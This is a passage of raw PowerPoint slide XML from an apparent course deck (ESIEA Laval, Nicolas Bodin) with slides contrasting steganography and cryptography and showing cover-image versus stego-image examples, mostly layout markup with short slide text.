                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>supervised</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="297" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>learning</a:t>
            </a:r>
            <a:endParaRPr sz="2081" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360834" y="4266167"/>
            <a:ext cx="8418352" cy="2273836"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4248150" h="1147445">
                <a:moveTo>
                  <a:pt x="0" y="1147305"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4248048" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4248048" y="1147305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1147305"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="1E536D"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="4972994"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="5389204"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="5805416"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="6221626"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549737" y="4315808"/>
            <a:ext cx="8040848" cy="2018438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:tabLst>
                <a:tab pos="8014619" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Steganography </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>VS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Cryptography	</a:t>
            </a:r>
            <a:endParaRPr sz="2378">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="573821" marR="2666506">
              <a:lnSpc>
                <a:spcPct val="125299"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="436"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Make </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>invisible </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-139" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Make </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>incomprehensible  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Unknown </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-139" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VS  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Commonly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-178" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>used</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="573821" marR="2106527">
              <a:lnSpc>
                <a:spcPct val="125299"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-149" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Loose </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>when </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>detected </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-139" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-149" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Loose </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>when </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>retrieved  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-168" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Spies </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-188" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>?  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-139" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-149" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>anyone</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-218" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-188" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165070" y="12638854"/>
            <a:ext cx="5798470" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t>ESIEA </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Laval </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Nicolas</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t>Bodin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13054948" y="12638854"/>
            <a:ext cx="4167651" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="50335">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="-129" dirty="0"/>
              <a:pPr marL="50335">
                <a:lnSpc>
                  <a:spcPts val="1367"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>38</a:t>
            </a:fld>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>49</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2258519924"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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4748" y="102655"/>
            <a:ext cx="1045688" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7512484" y="102655"/>
            <a:ext cx="1073371" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>A.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549738" y="682125"/>
            <a:ext cx="3939890" cy="1029256"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2774" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Examples </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-208" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="198" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Steganography</a:t>
            </a:r>
            <a:endParaRPr sz="2774">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1429519">
              <a:spcBef>
                <a:spcPts val="2229"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-139" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cover</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-139" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Image</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5709750" y="1387881"/>
            <a:ext cx="1476043" cy="320216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2081" spc="-129" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Stego</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-139" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Image</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1420893" y="1743121"/>
            <a:ext cx="2853491" cy="2140118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4865370" y="1743121"/>
            <a:ext cx="2853491" cy="2140118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1848934" y="4264986"/>
            <a:ext cx="2140285" cy="2140285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5150714" y="4264986"/>
            <a:ext cx="2140285" cy="2140285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
